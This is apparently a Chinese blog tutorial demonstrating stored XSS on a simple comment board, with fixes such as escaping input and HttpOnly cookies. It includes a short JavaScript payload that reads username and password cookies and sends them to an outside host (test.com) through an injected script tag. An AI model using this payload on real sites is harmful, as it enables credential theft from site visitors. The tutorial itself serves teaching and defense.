XSS攻击简单实例

XSS为目前web常见攻击手段之一，不了解的同学可以看我的上一篇文章《常见WEB攻击之XSS攻击》

下面我演示一个简单的留言板攻击实例

我们有个页面用于允许用户发表留言，然后在页面底部显示留言列表
前端代码如下：

    
    
    
    

        

            
Your Comment
            

                Nick Name:                

                
            
            

                Comment:                

                
            
            

                
            
            

                
Comments
            
            
        
    

addElement()方法用于添加新的留言，而renderComments()方法用于展留言列表，网页看起来是这样的

02105935_5hbx.png

XSS攻击

因为我们完全信任了用户输入，但有些别有用心的用户会像这样的输入

02105935_jLwV.png

这样无论是谁访问这个页面的时候控制台都会输出“Hey you are a fool fish!”，如果这只是个恶意的小玩笑，有些人做的事情就不可爱了，有些用户会利用这个漏洞窃取用户信息、诱骗人打开恶意网站或者下载恶意程序等，看个最简单的例子

利用xss窃取用户名密码

当然这个示例很简单，几乎攻击不到任何网站，仅仅看看其原理。我们知道很多登陆界面都有记住用户名、密码的功能方便用户下次登录，有些网站是直接用明文记录用户名、密码，恶意用户注册账户登录后使用简单工具查看cookie结构名称后，如果网站有xss漏洞，那么简单的利用jsonp就可以获取其它用户的用户名、密码了。

恶意用户会这么输入

02105935_6Ad3.png

我们看看 http://test.com/hack.js 里藏了什么

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

几句简单的javascript，获取cookie中的用户名密码，利用jsonp把向 http://test.com/index.php

发送了一个get请求
http://test.com/index.php

上面演示的是一个非常简单的XSS攻击，还有很多隐蔽的方式，但是其核心都是利用了脚本注入。
因此我们解决办法其实很简单：不信赖用户输入，对特殊字符如”<”,”>”转义，就可以从根本上防止这一问题。使用htmlspecialchars函数将特殊字符转换成HTML编码。

XSS攻击可以进行session劫持：Hack通过脚本注入到应用服务器，待其他真实用户A登录访问含有XSS脚本的网页，脚本激活，将客户的session信息发送给Hack，Hack就使用该session直接扮演用户A访问服务器。这种session劫持主要靠XSS漏洞和客户端获取sessionId完成，防范分两步：
1、过滤用户输入，防止XSS漏洞
2.、设置sessionId的cookie为HttpOnly，使客户端无法获取